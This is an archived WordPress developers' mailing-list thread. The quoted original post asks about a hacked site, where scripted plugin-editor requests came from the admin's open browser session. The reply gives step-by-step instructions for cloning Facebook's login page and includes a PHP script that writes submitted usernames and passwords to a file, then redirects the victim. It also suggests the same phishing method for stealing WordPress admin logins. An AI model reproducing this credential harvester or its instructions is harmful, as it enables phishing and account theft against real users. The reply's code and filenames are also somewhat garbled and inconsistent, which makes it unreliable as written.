[wp-hackers] Viruses that look for open WordPress tabs in your browser?

J G griffiths_j at hotmail.com
Tue Dec 15 02:19:07 UTC 2015

I know that I tested this on my own facebook account and it did work, it deals with GET and POST commands. Copy and past source from facebook.com login (frst page) and if changing action= to GET and save the manipulated source code as index.php and FTP to your own web server and save log.txt in same root folder with the log reading 
<?phpheader("Location: http://www.facebook.com/home.php? ");$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
a new file would be created within the same folder as index.php, log.txt and it would display Username and Password. I imagine by doing this very similar phishing attack one could gain access to  an admim-wp account? Correct me please if I am on a completely different subject it just seemed familiar. This attack no longer works for facebook.
> To: wp-hackers at lists.automattic.com
> From: david at wordshell.net
> Date: Fri, 11 Dec 2015 00:03:46 +0000
> Subject: [wp-hackers] Viruses that look for open WordPress tabs in your	browser?
> Has anyone come across the following before? Or is it potentially a new 
> thing? (I've not read any such thing before).
> I'm examining a hacked WP site. The logs show that the site owner, the 
> sole admin, was logged in, and working on it in wp-admin in a normal 
> way, up until 02:52 on a certain day. Then absolutely nothing until 
> 03:35. Then at 03:35, wham - a single GET followed by a load of POST 
> requests to the plugin editor, one for each plugin, inserting hacker 
> code. All from the admin's IP/browser (same user agent), and too close 
> together to be human (i.e. obviously scripted). It's all the same IP and 
> browser session, which is confirmed as the site owner's ISP.
> My inference from that is that the site owner, at 02:52, went to do 
> other things, leaving the browser tab open. They got infected with a 
> virus (or perhaps already were), and that virus hunted for open browser 
> sessions logged-in to wp-admin, and used those sessions to infect the WP 
> site.
> That's all technically do-able. But I've not previously heard of a virus 
> (the customer has a Mac, and was using Safari), that does this. Is this 
> a new thing?
> David
> -- 
> UpdraftPlus - best WordPress backups - http://updraftplus.com
> WordShell - WordPress fast from the CLI - http://wordshell.net
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

More information about the wp-hackers mailing list